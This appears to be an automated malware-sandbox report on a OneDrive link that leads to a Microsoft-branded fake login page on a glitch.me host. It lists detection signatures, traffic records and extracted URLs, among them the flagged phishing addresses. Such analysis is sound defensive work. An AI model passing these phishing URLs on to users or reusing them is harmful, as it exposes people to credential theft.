Windows Analysis Report
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9

Overview

General Information

Sample URL: https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Analysis ID: 562252
Infos:

Detection

HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Antivirus detection for URL or domain
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Yara signature match
No HTML title found
HTML body contains low number of good links

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://magenta-flicker-surprise.glitch.me/freedo.html SlashNext: Label: Fake Login Page type: Phishing & Social usering
Source: https://shopget24.com/images/sampledata/hack-run.png Avira URL Cloud: Label: phishing

Phishing
barindex
Phishing site detected (based on favicon image match)
Source: https://magenta-flicker-surprise.glitch.me/freedo.html Matcher: Template: office matched with high similarity
Yara detected HtmlPhish10
Source: Yara match File source: 13645.4.pages.csv, type: HTML
Phishing site detected (based on logo template match)
Source: https://magenta-flicker-surprise.glitch.me/freedo.html Matcher: Template: office matched
Phishing site detected (based on image similarity)
Source: embedded Matcher: Found strong image similarity, brand: Microsoft image: 13645.4.img.2.gfk.csv C3FC46C5799C76F9107504028F39190F
Source: embedded Matcher: Found strong image similarity, brand: Microsoft image: 13645.4.img.3.gfk.csv FE22440D79FFA34950F512EF4A718B2A
No HTML title found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: HTML title missing
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: HTML title missing
HTML body contains low number of good links
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: Number of links: 0
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: Number of links: 0
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: No <meta name="author".. found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: No <meta name="author".. found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: No <meta name="copyright".. found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
Source: unknown HTTPS traffic detected: 104.19.143.111:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.219.248.46:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 16:24:56 GMTContent-Length: 3672Connection: closeCache-Control: max-age=0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 16:24:57 GMTContent-Length: 3672Connection: closeCache-Control: max-age=0
Source: angular.js.0.dr String found in binary or memory: http://angularjs.org
Source: data_3.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: data_3.2.dr String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: data_3.2.dr String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: data_3.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: data_3.2.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: data_3.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: data_3.2.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
Source: data_3.2.dr String found in binary or memory: http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0
Source: angular.js.0.dr String found in binary or memory: http://errors.angularjs.org/1.6.4-local
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr String found in binary or memory: http://llvm.org/):
Source: data_3.2.dr String found in binary or memory: http://ocsp.digicert.com0
Source: data_3.2.dr String found in binary or memory: http://ocsp.digicert.com0F
Source: data_3.2.dr String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: data_3.2.dr String found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: data_3.2.dr String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: data_3.2.dr String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: data_3.2.dr String found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: data_3.2.dr String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: data_1.2.dr String found in binary or memory: http://shopget24.com/images/sampledata/hack-run.png
Source: data_1.2.dr String found in binary or memory: http://shopget24.com/images/sampledata/hack-run.pngD
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://tools.ietf.org/html/rfc1950
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: data_3.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: data_1.2.dr String found in binary or memory: https://1drv.ms/o/s
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: data_1.2.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js
Source: data_1.2.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-2.1.3.min.js
Source: data_1.2.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-2.1.3.min.js&
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://ajax.googleapis.com
Source: Network Action Predictor.0.dr String found in binary or memory: https://ajax.googleapis.com/
Source: data_1.2.dr String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: data_1.2.dr String found in binary or memory: https://amcdn.msftauth.net/me?partner=OneNoteOnline&version=10.21153.1&market=EN-US&wrapperId=suites
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://apis.google.com
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/resources/1033/FavIcon_OneNote.ico
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/resources/1033/FavIcon_OneNote.icosC
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/OneNoteSimplified.Wac.TellMeM
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-intl-mlr.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-navpane-strings.min.j
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-ribbon-intl.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-ribbon-intl.min.js5
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-ribbon-sprite-lazy.mi
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/osfruntime_strings.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/Feedback/latest/Intl/en/officebrow
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/Feedback/latest/officebrowserfeedb
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/OfficeExtension.WacRuntime.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/OneNoteSimplified.Wac.TellMeSugges
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appChrome.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appChromeLazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appChromeLazy.min.jsD
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appIconsLazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/common.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/common50.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/common50.min.jsl
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/hammer.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/navigation.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/onenoteloadingspinner.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreolazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreolazy.min.jsB
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreonavpane.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreonotebookpane.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreosearchpane.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreosearchpane.min.jsrj
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/osfruntime_ono.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/osfruntime_ono.jsUb
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/otelFullNext.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/js/suiteux.shell.con
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/js/suiteux.shell.cor
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/js/suiteux.shell.plu
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/strings/en/shellstri
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiFabricLazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiFabricLazy.min.jsv
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiSlice20.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiSlice20.min.jso
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/wacairspaceanimationlibrary.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/Meetings_manifest.xml
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/agavedefaulticon96x96.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/box42.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/box42.pngGIF89a
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/box43.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/one.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/one.pngS
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/moe_status_icons.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/moe_status_icons.png3
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/moeerrorux.css
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/progress.gif
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/progress.gify
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/wapsw.png?b=1601492041026
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h03BB8ABC1B9A5DCE_resources/1033/OneNote.Refresh.css
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h03BB8ABC1B9A5DCE_resources/1033/OneNote.Refresh.cssc
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h07757BD4A5AB7D19_App_Scripts/wacBootNew.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h07757BD4A5AB7D19_App_Scripts/wacBootNew.min.js4E9
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h1660F93875D1DA61_App_Scripts/healthSmallOffline.worker.min
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h29DB8AD8C3F08967_App_Scripts/1033/WoncaIntl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h29DB8AD8C3F08967_App_Scripts/1033/WoncaIntl.js#x
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h2D66353A4E0ACF66_App_Scripts/1033/CommonIntl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h354425D0BEA81BEF_App_Scripts/onenote-boot.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h354425D0BEA81BEF_App_Scripts/onenote-boot.min.jsGIF89a
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h768633FA776B0791_App_Scripts/1033/OneNoteIntl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h816A0F42A2BF4732_resources/1033/EditSurface.css
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCBA89239522795D5_App_Scripts/Compat.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCBA89239522795D5_App_Scripts/Compat.jsCnV
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDS.box4.dll1.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDS.box4.dll1.jsChIKBw1
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDS.box4.dll2.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDs.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDs.js#
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCF8E38AF39F430EA_App_Scripts/jSanity.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hD379F9DC23A8E04A_App_Scripts/1033/Box4Intl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hD8326BB4760631A8_App_Scripts/MicrosoftAjaxDS.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hDA9483E47A8473BE_App_Scripts/onenoteSyncNew.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hDA9483E47A8473BE_App_Scripts/onenoteSyncNew.min.js7&
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hE5C1E39EBD126206_App_Scripts/fonts/sharedheaderplaceholder
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/BrowserUls.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/CommonDiagnostics.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/CommonDiagnostics.jsxs
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/ExternalResources/js-cookie.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/ExternalResources/js-cookie.js1
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/Instrumentation.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/LearningTools/LearningTools.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/aria-web-telemetry-2.9.0.min.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/aria-web-telemetry-2.9.0.min.js%
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/pickadate.min.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/pickadate.min.js%
Source: data_1.2.dr String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://clients2.google.com
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://clients2.google.com/cr/report
Source: manifest.json1.0.dr, manifest.json0.0.dr, manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://clients6.google.com
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: Network Action Predictor.0.dr String found in binary or memory: https://code.jquery.com/
Source: data_1.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: data_1.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js&
Source: data_1.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://content-autofill.googleapis.com
Source: data_1.2.dr String found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIfCQBqDrrhfpceEgk
Source: data_1.2.dr String found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIfCU7H5x14rgQNEgk
Source: data_1.2.dr String found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIqCUMt63w4MkDvEgk
Source: manifest.json0.0.dr String found in binary or memory: https://content.googleapis.com
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
Source: data_3.2.dr String found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushers
Source: data_3.2.dr String found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushersCross-Origin-Resource-Policy:
Source: data_3.2.dr String found in binary or memory: https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers
Source: 5eef011a-ef80-4190-b459-3b55c7d34d63.tmp.2.dr, 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, fbd8880a-7af6-4d47-9f74-404a31517fc6.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://dns.google
Source: manifest.json0.0.dr String found in binary or memory: https://feedback.googleusercontent.com
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://fonts.googleapis.com
Source: Network Action Predictor.0.dr String found in binary or memory: https://fonts.googleapis.com/
Source: data_1.2.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Yellowtail&display=swap
Source: manifest.json0.0.dr String found in binary or memory: https://fonts.googleapis.com;
Source: data_3.2.dr, 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://fonts.gstatic.com
Source: data_1.2.dr String found in binary or memory: https://fonts.gstatic.com/s/yellowtail/v17/OZpGg_pnoDtINPfRIlLohlvHwQ.woff2)
Source: manifest.json0.0.dr String found in binary or memory: https://fonts.gstatic.com;
Source: material_css_min.css.0.dr, angular.js.0.dr String found in binary or memory: https://github.com/angular/material
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://hangouts.clients6.google.com
Source: manifest.json0.0.dr String found in binary or memory: https://hangouts.google.com/
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
Source: data_1.2.dr String found in binary or memory: https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png
Source: data_3.2.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1643387084&rver=7.3.6962.0&wp=MBI_SSL&wre
Source: data_1.2.dr String found in binary or memory: https://logo.clearbit.com/gmail.com
Source: data_1.2.dr String found in binary or memory: https://logo.clearbit.com/gmail.comkf
Source: Network Action Predictor.0.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/
Source: data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/css/hover.css
Source: data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/css/hover.css/
Source: Current Session.0.dr, data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/freedo.html
Source: data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/freedo.htmlM
Source: Network Action Predictor.0.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/
Source: data_1.2.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: data_1.2.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://meetings.clients6.google.com
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://ogs.google.com
Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.com
Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.com/
Source: data_1.2.dr String found in binary or memory: https://onedrive.live.com/Handlers/Plt.mvc?bicild=&v=0.0.0
Source: data_1.2.dr String found in binary or memory: https://onedrive.live.com/Handlers/Plt.mvc?bicild=&v=0.0.0GIF89a
Source: data_1.2.dr String found in binary or memory: https://onedrive.live.com/handlers/clientstring.mvc?mkt=en-US&group=GroupFolders&v=19.773.0927.2003&
Source: data_1.2.dr String found in binary or memory: https://onedrive.live.com/handlers/clientstring.mvc?mkt=en-US&group=Office&v=19.773.0927.2003&useReq
Source: data_3.2.dr, Current Session.0.dr String found in binary or memory: https://onedrive.live.com/redir?resid=5890075B5D858872
Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.com/redir?resid=5890075B5D858872%21361&authkey=%21AjRjdqYSIWOk6SY&page=View&wd
Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.com/view.aspx?resid=5890075B5D858872
Source: data_3.2.dr String found in binary or memory: https://onedrive.live.comX-Content-Type-Options:
